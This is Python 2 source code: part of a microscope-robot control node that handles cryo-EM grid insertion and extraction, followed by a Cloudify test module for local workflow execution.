self.communication = TestCommunication()
else:
self.communication = communication_good
self.setStatus('processing')
self.extractinfo = None
self.extractcondition.release()
self.extract()
self.gridnumber = None
self.setStatus('idle')
self.setStatus('idle')
self.panel.gridQueueEmpty()
del self.communication
def startProcessing(self):
self.startevent.set()
def exit(self):
self.exitevent.set()
self.startevent.set()
node.Node.exit(self)
def lockScope(self):
self.logger.info('Locking scope...')
self.instrument.tem.lock()
self.logger.info('Scope locked.')
def unlockScope(self):
self.logger.info('Unlocking scope...')
self.instrument.tem.unlock()
self.logger.info('Scope unlocked.')
def zeroStage(self):
while True:
self.logger.info('Zeroing stage position...')
self.instrument.tem.StagePosition = {'x': 0.0, 'y': 0.0, 'z': 0.0, 'a': 0.0}
if self.stageIsZeroed():
break
else:
self.logger.info('Stage is not zeroed, trying again...')
self.logger.info('Stage position is zeroed.')
def stageIsZeroed(self, xyzlimit=1e-6, alimit=0.001):
stage = self.instrument.tem.StagePosition
x = abs(stage['x'])
y = abs(stage['y'])
z = abs(stage['z'])
a = abs(stage['a'])
if x<xyzlimit and y<xyzlimit and z<xyzlimit and a<alimit:
return True
else:
return False
def moveStagePositionZ(self,zval):
self.logger.info("Move stage position Z to: %s",zval)
self.instrument.tem.StagePosition = {'z': zval}
def holderNotInScope(self):
self.logger.info('Verifying there is no holder inserted...')
self.waitScope('HolderStatus', 'not inserted')
self.logger.info('No holder currently inserted.')
def holderInScope(self):
self.logger.info('Verifying holder is inserted...')
self.waitScope('HolderStatus', 'inserted')
self.logger.info('No holder currently inserted.')
def vacuumReady(self):
self.logger.info('Verifying vacuum is ready...')
self.waitScope('VacuumStatus', 'ready', 0.25)
self.logger.info('Vacuum is ready.')
def openColumnValves(self):
self.logger.info('Opening column valves...')
self.instrument.tem.ColumnValvePosition = 'open'
self.logger.info('Verifying column valves are open...')
self.waitScope('ColumnValvePosition', 'open', 0.25)
self.logger.info('Column valves are open.')
def closeColumnValves(self):
self.logger.info('Closing column valves...')
self.instrument.tem.ColumnValvePosition = 'closed'
self.logger.info('Verifying column valves are closed...')
self.waitScope('ColumnValvePosition', 'closed', 0.25)
self.logger.info('Column valves are closed.')
def turboPumpOn(self):
self.logger.info('Turning on turbo pump...')
self.instrument.tem.TurboPump = 'on'
self.logger.info('Verifying turbo pump is on...')
self.waitScope('TurboPump', 'on', 0.25)
self.logger.info('Turbo pump is on.')
def turboPumpOff(self):
self.logger.info('Turning off turbo pump...')
self.instrument.tem.TurboPump = 'off'
#self.logger.info('Verifying turbo pump is off...')
#self.waitScope('TurboPump', 'off', 0.25)
self.logger.info('Turbo pump is off.')
def stageReady(self):
self.logger.info('Waiting for stage to be ready...')
self.waitScope('StageStatus', 'ready', 0.25)
self.logger.info('Stage is ready...')
def setHolderType(self):
#type = 'single tilt'
type = 'cryo'
self.logger.info('Setting holder type to %s...' % (type,))
self.instrument.tem.HolderType = type
self.logger.info('Verifying holder type is set to %s...' % (type,))
self.waitScope('HolderType', type, 0.25)
self.logger.info('Holder type is set to %s.' % (type,))
def getColumnPressureThreshold(self):
threshold = self.settings['column pressure threshold']
if threshold is None:
threshold = self.defaultcolumnpressurethreshold
return threshold
def getDefaultZPosition(self):
defzposition = self.settings['default Z position']
if defzposition is None:
defzposition = self.defaultzposition
return defzposition
def checkColumnPressure(self):
threshold = self.getColumnPressureThreshold()
self.logger.info('Checking column pressure...')
while self.instrument.tem.ColumnPressure > threshold:
time.sleep(0.1)
threshold = self.getColumnPressureThreshold()
self.logger.info('Column pressure is below threshold.')
def checkHighTensionOn(self):
self.logger.info('Checking high tension state...')
self.waitScope('HighTensionState', 'on', 0.25)
self.logger.info('High tension is on.')
def insertCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Inserting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = True
self.waitScope('Inserted', True, 0.25)
self.logger.info('%s camera is inserted.' % ccdcamera)
def retractCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Retracting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = False
self.waitScope('Inserted', False, 0.25)
self.logger.info('%s camera is retracted.' % ccdcamera)
def scopeReadyForInsertion1(self):
self.logger.info('Readying microscope for insertion step 1...')
self.zeroStage()
self.holderNotInScope()
self.vacuumReady()
self.closeColumnValves()
self.stageReady()
self.logger.info('Microscope ready for insertion step 1.')
def scopeReadyForInsertion2(self):
self.logger.info('Readying microscope for insertion step 2...')
self.setHolderType()
self.stageReady()
self.logger.info('Microscope ready for insertion step 2.')
def scopeReadyForExtraction(self):
self.logger.info('Readying microscope for extraction...')
self.closeColumnValves()
self.retractCameras()
self.zeroStage()
self.holderInScope()
self.vacuumReady()
self.stageReady()
self.logger.info('Microscope ready for extraction.')
def scopeReadyForImaging(self):
self.logger.info('Readying microscope for imaging...')
if not self.settings['turbo on']:
self.turboPumpOff()
self.insertCameras()
self.checkHighTensionOn()
self.vacuumReady()
zposition = self.getDefaultZPosition()
if zposition:
self.moveStagePositionZ(zposition)
self.checkColumnPressure()
self.openColumnValves()
self.logger.info('Microscope ready for imaging.')
def signalRobotToInsert1(self):
self.logger.info('Signaling robot to begin insertion step 1')
self.communication.Signal1 = 1
self.logger.info('Signaled robot to begin insertion step 1')
def signalRobotToInsert2(self):
self.logger.info('Signaling robot to begin insertion step 2')
self.communication.Signal3 = 1
self.logger.info('Signaled robot to begin insertion step 2')
def signalRobotToExtract(self):
self.logger.info('Signaling robot to begin extraction')
self.communication.Signal6 = 1
self.logger.info('Signaled robot to begin extraction')
def emailGridClear(self, gridnumber):
m = 'Grid #%s failed to be removed from specimen holder properly'
subject = m % gridnumber
text = 'Reply to this message if grid is not in the specimen holder.\n' + \
'An image of the specimen holder is attached.'
time.sleep(5.0)
try:
raise NotImplemetedError
image = Image.open(imagefilename)
imagestring = emailnotification.PILImage2String(image)
except:
imagestring = None
self.emailclient.sendAndSet(self.gridcleared, subject, text, imagestring)
def waitForGridClear(self):
self.gridcleared.clear()
self.logger.warning('Waiting for confirmation that grid is clear')
self.setStatus('user input')
self.emailGridClear(self.gridnumber)
self.panel.clearGrid()
self.gridcleared.wait()
self.gridcleared = threading.Event()
self.communication.Signal10 = 1
def autoGridClear(self):
self.gridcleared.clear()
self.logger.info('Auto probe clearing')
self.communication.Signal10 = 1
def gridCleared(self):
self.gridcleared.set()
def waitForRobotToInsert1(self):
self.logger.info('Waiting for robot to complete insertion step 1')
while not self.communication.Signal2:
time.sleep(0.5)
self.communication.Signal2 = 0
self.logger.info('Robot has completed insertion step 1')
def waitForRobotToInsert2(self):
self.logger.info('Waiting for robot to complete insertion step 2')
while not self.communication.Signal4:
time.sleep(0.5)
self.communication.Signal4 = 0
self.logger.info('Robot has completed insertion step 2')
def robotReadyForExtraction(self):
self.logger.info('Verifying robot is ready for extraction')
while not self.communication.Signal5:
time.sleep(0.5)
self.communication.Signal5 = 0
self.logger.info('Robot is ready for extraction')
def waitForRobotToExtract(self):
self.logger.info('Waiting for robot to complete extraction')
while not self.communication.Signal7:
self.communication.Signal11 = int(self.settings['grid clear wait'])
if self.communication.Signal9:
self.logger.warning('Robot failed to remove grid from specimen holder')
if self.communication.Signal11 == 0:
self.autoGridClear()
else:
self.waitForGridClear()
self.communication.Signal9 = 0
self.setStatus('processing')
self.logger.info('Resuming operation')
time.sleep(0.5)
self.communication.Signal7 = 0
self.logger.info('Robot has completed extraction')
def getUserGridRequest(self):
gridnumber = -1
while not validateGridNumber(gridnumber):
gridnumber = self.panel.getNextGrid()
if gridnumber is None:
return None
return GridRequest(gridnumber)
def newGrid(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to create grid information: %s' % e)
return None
return projectdata.newGrid('Robot Generated Grid #%d' % gridnumber,
-1, gridnumber, gridboxid, gridnumber)
def getGridNumber(self, gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
grids = projectdata.getGrids()
gridsindex = grids.Index(['gridId'])
grid = gridsindex[gridid].fetchone()
if grid is None:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlabel = grid['label']
if grid['boxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[grid['boxId']]
self.logger.error('Grid "%s" is not in selected grid tray, but in "%s"' % (gridlabel,boxlabel))
return None
gridlocations = projectdata.getGridLocations()
gridlocationsindex = gridlocations.Index(['gridId'])
gridlocation = gridlocationsindex[gridid].fetchone()
if gridlocation is None:
self.logger.error('Failed to find grid number for grid "%s"' % (gridlabel))
return None
if gridlocation['gridboxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[gridlocation['gridboxId']]
self.logger.error('Last location for grid "%s" does not match selected tray, but "%s"' % (gridlabel,boxlabel))
return None
return int(gridlocation['location'])
def getGridID(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
for gridlocation in gridlocations:
if gridlocation['location'] == gridnumber:
return gridlocation['gridId']
return self.newGrid(gridboxid, gridnumber)
def publishEMGridData(self,gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridinfo = projectdata.getGridInfo(gridid)
emgriddata = leginondata.EMGridData()
emgriddata['name'] = gridinfo['label']
emgriddata['project'] = gridinfo['projectId']
self.publish(emgriddata, database=True)
return emgriddata
def makeGridData(self, gridnumber):
gridid = self.getGridID(self.gridtrayid, gridnumber)
if gridid is None:
return None
emgriddata = self.publishEMGridData(gridid)
initializer = {'grid ID': gridid}
querydata = leginondata.GridData(initializer=initializer)
griddatalist = self.research(querydata)
insertion = 0
for griddata in griddatalist:
if griddata['insertion'] > insertion:
insertion = griddata['insertion']
initializer = {'grid ID': gridid, 'insertion': insertion + 1, 'emgrid': emgriddata}
griddata = leginondata.GridData(initializer=initializer)
self.publish(griddata, database=True)
return griddata
def selectGrid(self, gridnumber):
if gridnumber is not None:
self.logger.info('Current grid: %d' % gridnumber)
self.communication.gridNumber = gridnumber
def robotReadyForInsertion(self):
self.logger.info('Verifying robot is ready for insertion')
while not self.communication.Signal0:
if self.communication.Signal8:
self.logger.warning('Robot failed to extract grid from tray')
self.communication.Signal8 = 0
raise GridLoadFromTrayError
time.sleep(0.5)
self.communication.Signal0 = 0
self.logger.info('Robot is ready for insertion')
def estimateTimeLeft(self):
if 'insert' not in self.timings:
self.timings['insert'] = []
self.timings['insert'].append(time.time())
timestring = ''
ntimings = len(self.timings['insert']) - 1
if ntimings > 0:
first = self.timings['insert'][0]
last = self.timings['insert'][-1]
ngridsleft = self.panel.getGridQueueSize()
secondsleft = (last - first)/ntimings*ngridsleft
timestring = seconds2str(secondsleft)
if timestring:
self.logger.info(timestring + ' remaining')
def insert(self):
self.lockScope()
self.logger.info('insert '+str(self.simulate)+' setting'+str(self.settings['simulate']))
if self.simulate or self.settings['simulate']:
self.estimateTimeLeft()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
raise
self.unlockScope()
return griddata
self.estimateTimeLeft()
self.logger.info('Inserting holder into microscope')
self.turboPumpOn()
self.robotReadyForInsertion()
try:
self.scopeReadyForInsertion1()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 1: %s' % e)
raise
self.signalRobotToInsert1()
self.waitForRobotToInsert1()
try:
self.scopeReadyForInsertion2()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 2: %s' % e)
raise
self.signalRobotToInsert2()
self.waitForRobotToInsert2()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
return
self.unlockScope()
return griddata
def extract(self):
if self.simulate or self.settings['simulate']:
self.logger.info('Extraction of holder successfully completed')
return
self.logger.info('Extracting holder from microscope')
self.lockScope()
self.turboPumpOn()
self.robotReadyForExtraction()
try:
self.scopeReadyForExtraction()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for extraction: %s' % e)
raise
self.signalRobotToExtract()
self.waitForRobotToExtract()
self.unlockScope()
self.logger.info('Extraction of holder successfully completed')
def handleGridDataCollectionDone(self, ievent):
# ...
if self.settings['pause']:
# pause for user check
self.setStatus('user input')
self.logger.info('waiting for user to continue...')
self.usercontinue.clear()
self.usercontinue.wait()
self.usercontinue.clear()
self.setStatus('processing')
self.logger.info('continuing')
self.panel.extractingGrid()
self.extractcondition.acquire()
self.extractinfo = (None, None)
self.extractcondition.notify()
self.extractcondition.release()
def getTrayLabels(self):
self.traysFromDB()
return self.gridtrayids.keys()
def setTray(self, traylabel):
try:
self.gridtrayid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
def getGridLabels(self, gridlist):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridlabels = []
for gridid in gridlist:
gridlabels.append(str(projectdata.getGridLabel(gridid)))
return gridlabels
def getGridLocations(self, traylabel):
try:
gridboxid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid locations: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
gridlabels = [i['gridId'] for i in gridlocations]
return [int(i['location']) for i in gridlocations],gridlabels
def gridInserted(self, gridnumber):
if self.simulate or self.settings['simulate']:
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
self.logger.info('Grid inserted.')
self.scopeReadyForImaging()
self.logger.info('Outputting data collection event')
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
def waitScope(self, parameter, value, interval=None, timeout=0.0):
if self.instrument.tem.hasAttribute(parameter):
o = self.instrument.tem
elif self.instrument.ccdcamera.hasAttribute(parameter):
o = self.instrument.ccdcamera
else:
raise ValueError('invalid parameter')
parametervalue = getattr(o, parameter)
elapsed = 0.0
if interval is not None and interval > 0:
while parametervalue != value:
time.sleep(interval)
if timeout > 0.0:
elapsed += interval
if elapsed > timeout:
raise ValueError('parameter is not set to value')
parametervalue = getattr(o, parameter)
else:
if parametervalue != value:
raise ValueError('parameter is not set to value')
|
test_local_workflows.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import contextlib
import time
import yaml
import sys
import tempfile
import shutil
import os
import threading
import Queue
import testtools
from testtools.matchers import ContainsAll
import cloudify.logs
from cloudify.decorators import workflow, operation
from cloudify.exceptions import NonRecoverableError
from cloudify.workflows import local
from cloudify.workflows import workflow_context
from cloudify.workflows.workflow_context import task_config
PLUGIN_PACKAGE_NAME = 'test-package'
PLUGIN_PACKAGE_VERSION = '1.1.1'
class BaseWorkflowTest(object):
def setUp(self):
self.work_dir = tempfile.mkdtemp(prefix='cloudify-workflows-')
self.blueprint_dir = os.path.join(self.work_dir, 'blueprint')
self.storage_dir = os.path.join(self.work_dir, 'storage')
self.storage_kwargs = {}
self.env = None
os.mkdir(self.storage_dir)
self.addCleanup(self.cleanup)
testtools.TestCase.setUp(self)
def cleanup(self):
shutil.rmtree(self.work_dir)
self._remove_temp_module()
def _init_env(self, blueprint_path,
inputs=None,
name=None,
ignored_modules=None,
provider_context=None):
if name is None:
name = self._testMethodName
storage = self.storage_cls(**self.storage_kwargs)
if isinstance(storage, local.FileStorage) \
and (self.storage_dir != self.blueprint_dir):
shutil.rmtree(self.storage_kwargs['storage_dir'])
return local.init_env(blueprint_path,
name=name,
inputs=inputs,
storage=storage,
ignored_modules=ignored_modules,
provider_context=provider_context)
def _load_env(self, name):
if name is None:
name = self._testMethodName
storage = self.storage_cls(**self.storage_kwargs)
return local.load_env(name=name,
storage=storage)
def _setup_env(self,
workflow_methods=None,
operation_methods=None,
use_existing_env=True,
name=None,
inputs=None,
create_blueprint_func=None,
workflow_parameters_schema=None,
load_env=False,
ignored_modules=None,
operation_retries=None,
operation_retry_interval=None,
provider_context=None):
if create_blueprint_func is None:
create_blueprint_func = self._blueprint_1
def stub_op(ctx, **_):
pass
if operation_methods is None:
operation_methods = [stub_op]
if workflow_methods[0] is None:
def workflow_method(ctx, **_):
instance = _instance(ctx, 'node')
instance.set_state('state').get()
instance.execute_operation('test.op0')
workflow_methods = [workflow_method]
# same as @workflow above the method
workflow_methods = [workflow(m) for m in workflow_methods]
# same as @operation above each op method
operation_methods = [operation(m) for m in operation_methods]
temp_module = self._create_temp_module()
for workflow_method in workflow_methods:
setattr(temp_module,
workflow_method.__name__,
workflow_method)
for operation_method in operation_methods:
setattr(temp_module,
operation_method.__name__,
operation_method)
blueprint = create_blueprint_func(workflow_methods,
operation_methods,
workflow_parameters_schema,
ignored_modules,
operation_retries,
operation_retry_interval)
inner_dir = os.path.join(self.blueprint_dir, 'inner')
if not os.path.isdir(self.blueprint_dir):
os.mkdir(self.blueprint_dir)
if not os.path.isdir(inner_dir):
os.mkdir(inner_dir)
with open(os.path.join(inner_dir, 'imported.yaml'), 'w') as f:
f.write('node_types: { imported_type: {} }')
with open(os.path.join(self.blueprint_dir, 'resource'), 'w') as f:
f.write('content')
blueprint_path = os.path.join(self.blueprint_dir, 'blueprint.yaml')
with open(blueprint_path, 'w') as f:
f.write(yaml.safe_dump(blueprint))
if not self.env or not use_existing_env:
if load_env:
self.env = self._load_env(name)
else:
self.env = self._init_env(blueprint_path,
inputs=inputs,
name=name,
ignored_modules=ignored_modules,
provider_context=provider_context)
def _execute_workflow(self,
workflow_method=None,
operation_methods=None,
use_existing_env=True,
execute_kwargs=None,
name=None,
inputs=None,
create_blueprint_func=None,
workflow_parameters_schema=None,
workflow_name='workflow0',
load_env=False,
setup_env=True,
ignored_modules=None,
operation_retries=None,
operation_retry_interval=None,
provider_context=None):
if setup_env:
self._setup_env(
workflow_methods=[workflow_method],
operation_methods=operation_methods,
use_existing_env=use_existing_env,
name=name,
inputs=inputs,
create_blueprint_func=create_blueprint_func,
workflow_parameters_schema=workflow_parameters_schema,
load_env=load_env,
ignored_modules=ignored_modules,
operation_retries=operation_retries,
operation_retry_interval=operation_retry_interval,
provider_context=provider_context)
elif load_env:
self.env = self._load_env(name)
execute_kwargs = execute_kwargs or {}
final_execute_kwargs = {
'task_retries': 0,
'task_retry_interval': 1
}
final_execute_kwargs.update(execute_kwargs)
return self.env.execute(workflow_name, **final_execute_kwargs)
def _blueprint_1(self, workflow_methods, operation_methods,
workflow_parameters_schema, ignored_modules,
operation_retries, operation_retry_interval):
interfaces = {
'test': dict(
('op{0}'.format(index),
{'implementation': 'p.{0}.{1}'.format(self._testMethodName,
op_method.__name__),
'max_retries': operation_retries,
'retry_interval': operation_retry_interval})
for index, op_method in
enumerate(operation_methods)
)
}
if ignored_modules:
interfaces['test'].update({'ignored_op': 'p.{0}.ignored'
.format(ignored_modules[0])})
workflows = dict((
('workflow{0}'.format(index), {
'mapping': 'p.{0}.{1}'.format(self._testMethodName,
w_method.__name__),
'parameters': workflow_parameters_schema or {}
}) for index, w_method in enumerate(workflow_methods)
))
blueprint = {
'tosca_definitions_version': 'cloudify_dsl_1_3',
'imports': ['inner/imported.yaml'],
'inputs': {
'from_input': {
'default': 'from_input_default_value'
}
},
'outputs': {
'some_output': {
'value': {'get_attribute': ['node', 'some_output']},
},
'static': {
'value': {'get_attribute': ['node', 'property']}
}
},
'plugins': {
'p': {
'executor': 'central_deployment_agent',
'install': False,
'package_name': PLUGIN_PACKAGE_NAME,
'package_version': PLUGIN_PACKAGE_VERSION
}
},
'node_types': {
'type': {
'properties': {
'property': {
'default': 'default'
},
'from_input': {
'default': 'from_input_default_value'
}
}
},
'cloudify.nodes.Compute': {
'derived_from': 'type',
'properties': {
'ip': {
'default': ''
}
}
}
},
'relationships': {
'cloudify.relationships.contained_in': {}
},
'node_templates': {
'node4': {
'type': 'type',
'interfaces': interfaces,
'relationships': [{
'target': 'node3',
'type': 'cloudify.relationships.contained_in',
}]
},
'node3': {
'type': 'cloudify.nodes.Compute',
'interfaces': interfaces,
'properties': {
'ip': '1.1.1.1'
}
},
'node2': {
'type': 'cloudify.nodes.Compute',
'interfaces': interfaces,
},
'node': {
'type': 'type',
'interfaces': interfaces,
'properties': {
'property': 'value',
'from_input': {'get_input': 'from_input'}
},
'relationships': [{
'target': 'node2',
'type': 'cloudify.relationships.contained_in',
'source_interfaces': interfaces,
'target_interfaces': interfaces
}]
},
'node5': {
'type': 'imported_type'
}
},
'workflows': workflows,
'groups': {
'group1': {
'members': ['node']
}
},
'policies': {
'policy1': {
'type': 'cloudify.policies.scaling',
'targets': ['group1']
}
}
}
return blueprint
def _create_temp_module(self):
import imp
temp_module = imp.new_module(self._testMethodName)
sys.modules[self._testMethodName] = temp_module
return temp_module
def _remove_temp_module(self):
if self._testMethodName in sys.modules:
del sys.modules[self._testMethodName]
@contextlib.contextmanager
def _mock_stdout_event_and_log(self):
events = []
logs = []
# Provide same interface as other log/event functions
def mock_stdout_event(event):
events.append(event)
# Provide same interface as other log/event functions
def mock_stdout_log(log):
logs.append(log)
o_stdout_event = cloudify.logs.stdout_event_out
o_stdout_log = cloudify.logs.stdout_log_out
cloudify.logs.stdout_event_out = mock_stdout_event
cloudify.logs.stdout_log_out = mock_stdout_log
try:
yield events, logs
finally:
cloudify.logs.stdout_event_out = o_stdout_log
cloudify.logs.stdout_event_out = o_stdout_event
def _test_retry_configuration_impl(self,
global_retries,
global_retry_interval,
operation_retries,
operation_retry_interval):
expected_retries = global_retries
if operation_retries is not None:
expected_retries = operation_retries
expected_retry_interval = global_retry_interval
if operation_retry_interval is not None:
expected_retry_interval = operation_retry_interval
def flow(ctx, **_):
instance = _instance(ctx, 'node')
instance.execute_operation('test.op0', kwargs={
'props': {'key': 'initial_value'}
}).get()
instance.execute_operation('test.op1').get()
def op0(ctx, props, **_):
self.assertIsNotNone(ctx.instance.id)
current_retry = ctx.instance.runtime_properties.get('retry', 0)
last_timestamp = ctx.instance.runtime_properties.get('timestamp')
current_timestamp = time.time()
ctx.instance.runtime_properties['retry'] = current_retry + 1
ctx.instance.runtime_properties['timestamp'] = current_timestamp
self.assertEqual('initial_value', props['key'])
props['key'] = 'new_value'
if current_retry > 0:
duration = current_timestamp - last_timestamp
self.assertTrue(expected_retry_interval <= duration <=
expected_retry_interval + 0.5)
if current_retry < expected_retries:
self.fail()
def op1(ctx, **_):
self.assertEqual(
expected_retries + 1, ctx.instance.runtime_properties['retry'])
self._execute_workflow(
flow,
operation_methods=[op0, op1],
operation_retries=operation_retries,
operation_retry_interval=operation_retry_interval,
execute_kwargs={
'task_retry_interval': global_retry_interval,
'task_retries': global_retries})
class LocalWorkflowTest(BaseWorkflowTest):
def setUp(self):
super(LocalWorkflowTest, self).setUp()
def test_workflow_and_operation_logging_and_events(self):
def assert_task_events(indexes, events):
self.assertEqual('sending_task',
events[indexes[0]]['event_type'])
self.assertEqual('task_started',
events[indexes[1]]['event_type'])
self.assertEqual('task_succeeded',
events[indexes[2]]['event_type'])
def the_workflow(ctx, **_):
def local_task():
pass
instance = _instance(ctx, 'node')
ctx.logger.info('workflow_logging')
ctx.send_event('workflow_event').get()
instance.logger.info('node_instance_logging')
instance.send_event('node_instance_event').get()
instance.execute_operation('test.op0').get()
ctx.local_task(local_task).get()
def the_operation(ctx, **_):
ctx.logger.info('op_logging')
ctx.send_event('op_event')
with self._mock_stdout_event_and_log() as (events, logs):
self._execute_workflow(the_workflow, operation_methods=[
the_operation])
self.assertEqual(11, len(events))
self.assertEqual(3, len(logs))
self.assertEqual('workflow_started',
events[0]['event_type'])
self.assertEqual('workflow_event',
events[1]['message']['text'])
self.assertEqual('node_instance_event',
events[2]['message']['text'])
assert_task_events([3, 4, 6], events)
self.assertEqual('op_event',
events[5]['message']['text'])
assert_task_events([7, 8, 9], events)
self.assertEqual('workflow_succeeded',
events[10]['event_type'])
self.assertEqual('workflow_logging',
logs[0]['message']['text'])
self.assertEqual('node_instance_logging',
logs[1]['message']['text'])
self.assertEqual('op_logging',
logs[2]['message']['text'])
def test_task_event_filtering(self):
def flow1(ctx, **_):
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow1, use_existing_env=False)
self.assertEqual(5, len(events))
def flow2(ctx, **_):
def task():
pass
ctx.local_task(task, send_task_events=False)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow2,
use_existing_env=False)
self.assertEqual(2, len(events))
def flow3(ctx, **_):
@task_config(send_task_events=False)
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow3, use_existing_env=False)
self.assertEqual(2, len(events))
def flow4(ctx, **_):
@task_config(send_task_events=True)
def task():
pass
ctx.local_task(task)
with self._mock_stdout_event_and_log() as (events, _):
self._execute_workflow(flow4, use_existing_env=False)
self.assertEqual(5, len(events))
def flow5(ctx, **_):
def task():
self.fail()
ctx.local_task(task, send_task_events=False)
with self._mock_stdout_event_and_log() as (events, _):
self.assertRaises(AssertionError,
self._execute_workflow,
flow5, use_existing_env=False)
self.assertEqual(3, len(events))
self.assertEqual('task_failed', events[1]['event_type'])
self.assertEqual('workflow_failed', events[2]['event_type'])
def test_task_config_decorator(self):
def flow(ctx, **_):
task_config_kwargs = {'key': 'task_config'}
invocation_kwargs = {'key': 'invocation'}
@task_config(kwargs=task_config_kwargs)
def task1(**kwargs):
self.assertEqual(kwargs, task_config_kwargs)
ctx.local_task(task1).get()
@task_config(kwargs=task_config_kwargs)
def task2(**kwargs):
self.assertEqual(kwargs, task_config_kwargs)
ctx.local_task(task2, kwargs=invocation_kwargs).get()
@task_config(kwargs=task_config_kwargs)
def task3(**kwargs):
self.assertEqual(kwargs, invocation_kwargs)
ctx.local_task(task3,
kwargs=invocation_kwargs,
override_task_config=True).get()
self._execute_workflow(flow)
def test_workflow_bootstrap_context(self):
def bootstrap_context(ctx, **_):
bootstrap_context = ctx.internal._get_bootstrap_context()
self.assertEqual(bootstrap_context, {})
self._execute_workflow(bootstrap_context)
def test_update_execution_status(self):
def update_execution_status(ctx, **_):
ctx.update_execution_status('status')
self.assertRaises(NotImplementedError,
self._execute_workflow,
update_execution_status)
def test_workflow_set_get_node_instance_state(self):
def get_set_node_instance_state(ctx, **_):
instance = _instance(ctx, 'node')
self.assertIsNone(instance.get_state().get())
instance.set_state('state').get()
self.assertEquals('state', instance.get_state().get())
self._execute_workflow(get_set_node_instance_state)
def test_workflow_ctx_properties(self):
def attributes(ctx, **_):
self.assertEqual(self._testMethodName, ctx.blueprint.id)
self.assertEqual(self._testMethodName, ctx.deployment.id)
self.assertEqual(
['node'], ctx.deployment.scaling_groups['group1']['members'])
node_instance = next(ctx.get_node('node').instances)
scaling_groups = node_instance.scaling_groups
self.assertEqual(1, len(scaling_groups))
self.assertEqual('group1', scaling_groups[0]['name'])
self.assertEqual('workflow0', ctx.workflow_id)
self.assertIsNotNone(ctx.execution_id)
self._execute_workflow(attributes)
def test_workflow_blueprint_model(self):
def blueprint_model(ctx, **_):
nodes = list(ctx.nodes)
node1 = ctx.get_node('node')
node2 = ctx.get_node('node2')
node1_instances = list(node1.instances)
node2_instances = list(node2.instances)
instance1 = node1_instances[0]
instance2 = node2_instances[0]
node1_relationships = list(node1.relationships)
node2_relationships = list(node2.relationships)
instance1_relationships = list(instance1.relationships)
instance2_relationships = list(instance2.relationships)
relationship = node1_relationships[0]
relationship_instance = instance1_relationships[0]
self.assertEqual(5, len(nodes))
self.assertEqual(1, len(node1_instances))
self.assertEqual(1, len(node2_instances))
self.assertEqual(1, len(node1_relationships))
self.assertEqual(0, len(node2_relationships))
self.assertEqual(1, len(instance1_relationships))
self.assertEqual(0, len(instance2_relationships))
sorted_ops = ['op0', 'test.op0']
self.assertEqual(1, node1.number_of_instances)
self.assertEqual(1, node2.number_of_instances)
self.assertEqual('node', node1.id)
self.assertEqual('node2', node2.id)
self.assertEqual('type', node1.type)
self.assertEqual('type', node1.type)
self.assertEqual('cloudify.nodes.Compute', node2.type)
self.assertEqual(['type'], node1.type_hierarchy)
self.assertEqual(['type', 'cloudify.nodes.Compute'],
node2.type_hierarchy)
self.assertThat(node1.properties.items(),
ContainsAll({'property': 'value'}.items()))
self.assertThat(node2.properties.items(),
ContainsAll({'property': 'default'}.items()))
self.assertEqual(sorted_ops, sorted(node1.operations.keys()))
